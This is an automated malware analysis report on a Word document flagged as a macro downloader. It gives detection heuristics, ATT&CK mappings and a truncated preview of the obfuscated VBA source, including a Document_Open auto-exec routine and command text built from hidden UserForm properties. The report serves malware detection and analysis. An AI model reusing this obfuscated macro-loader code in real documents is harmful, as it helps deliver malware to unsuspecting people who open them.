MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file contains VBA macros, including a Document_Open macro and a hidden UserForm command stager, which are indicative of malicious intent. The heuristics suggest the macro is designed to execute code, likely to download and run a secondary payload. The ClamAV detection further supports its malicious nature. No specific IOCs like URLs or file paths were directly extractable from the provided script due to obfuscation and truncation.
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-7451224-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7451224-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8244 bytes |
SHA-256: a8b5b1011aada0db9edd5d36c8907ecff42a6ea169d31cf77c8806a39d2a43bc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Lljhsuihdpfu"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Oizivtefueia, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select Case Zrvtkymqcpdn
Case 532
Wdcosjgvj = Cos(504)
Nkuintqboph = Atn(737)
Dolzxlzmxroe = Cos(498)
Case 418
Ddmehxcxoshov = Atn(469)
Gqpukleyhy = 786
Eptgetxnxckal = CDate(411)
Case 30
Atriqmzqa = CInt(537)
Jkyfegjzyh = Log(Duxzoegojv)
Eqqhmezs = Knosxeqmryfh
End Select
Select Case Pmkwpxbblz
Case 447
Spphlkifdfdhc = Cos(999)
Mirtnyazart = Atn(569)
Lhmguvdikykuy = Cos(301)
Case 162
Jiduiiptu = Atn(153)
Arppqswjt = 817
Wmgdfbkgzpyv = CDate(815)
Case 741
Nzfrvnrbnvmt = CInt(623)
Sxogiqmrn = Log(Njngscvz)
Srrxjbvz = Mgcobarnzfw
End Select
Select Case Jajtzexvhjqt
Case 200
Qyycbmshqhmfb = Cos(956)
Ipcmwgnbtxun = Atn(67)
Elbtflyh = Cos(695)
Case 43
Wbbjbhudzby = Atn(368)
Hyrcxefhycg = 83
Llvmvboopvedz = CDate(413)
Case 793
Rnockxtv = CInt(638)
Acwgxyvyf = Log(Hnfxfyrdm)
Sbqlndbyrqheu = Hswjftqujajf
End Select
Uoxuyzsxu
End Sub
Attribute VB_Name = "Ssdijpjrn"
Attribute VB_Base = "0{CAE4F635-CF4E-4A69-B5EA-5FF7DB352CF7}{89760FFD-0C7B-4D7A-9AD8-5BF2E8149268}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Zftyfaxnmhn"
Function Fsdxjtoyka()
Select Case Frernmjevejh
Case 8
Uieyirchv = Cos(323)
Jqkgduhog = Atn(471)
Wpahjkwh = Cos(638)
Case 507
Mqsboqwerywd = Atn(113)
Wzxrkbtz = 765
Moxbhrkoupw = CDate(63)
Case 623
Epdljocisgxk = CInt(545)
Eweznmbpzt = Log(Anhjugxhscgqj)
Iuiaqxeg = Pinqppjpmop
End Select
Lqfbfhwboutcn = Lljhsuihdpfu.Oizivtefueia
Select Case Juqhoixb
Case 388
Cfjhjhttda = Cos(392)
Gzmvhfwllht = Atn(247)
Pkifwuhizmahd = Cos(908)
Case 823
Fekpfsorvsase = Atn(597)
Umiltwlohfnig = 622
Odmaghxdud = CDate(251)
Case 281
Mnvcciasoyrz = CInt(360)
Qcksjhekdxgd = Log(Xiohtcyamdka)
Wqlmbmqutcut = Jxwzoivg
End Select
Vfovdvtysscjm = Lqfbfhwboutcn + Ssdijpjrn.Tzaoqrwqfvvft + Ssdijpjrn.Xpabylbowh + Ssdijpjrn.Bzaqpzxmuvtaw
Select Case Zsrcdnznp
Case 694
Ocpxpivphuzd = Cos(929)
Zugrnfyz = Atn(842)
Gzwunqosnqf = Cos(150)
Case 796
Rqgkiakzpaz = Atn(35)
Twbpspxbrqmb = 7
Fhpbxzfobgu = CDate(49)
Case 17
Uorzxquxsqyxq = CInt(350)
Aaujgjeszyb = Log(Fuuucpcnaqo)
Tmqrdgwqn = Ljpqvrawmf
End Select
Volnrlwv = Vfovdvtysscjm + Ssdijpjrn.Tbmbexondtx + Ssdijpjrn.Nsewjwkywlg.ControlTipText
Select Case Suajhthfifv
Case 664
Kpjvmqtnuawd = Cos(67)
Tzaluhwibosza = Atn(180)
Bcibknsrrl = Cos(745)
Case 516
Dytefxwogiu = Atn(726)
Vbnvcmppesxn = 293
Jaiizmqtkhknb = CDate(464)
Case 815
Ctihjolfwpz = CInt(974)
Yfwqdymn = Log(Uobcqfkp)
Aczpgtlxvm = Upvflujd
End Select
Fsdxjtoyka = Gcogsfuow + Volnrlwv + Gcogsfuow
Select Case Etioqtsrfaf
Case 338
Bxamcconha = Cos(677)
Xywponptnthv = Atn(233)
Uuefmcdmf = Cos(109)
Case 791
Tdodbxtxvtv = Atn(277)
Rmpiyiqf = 729
Iuiboiolshbu = CDate(996)
Case 364
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.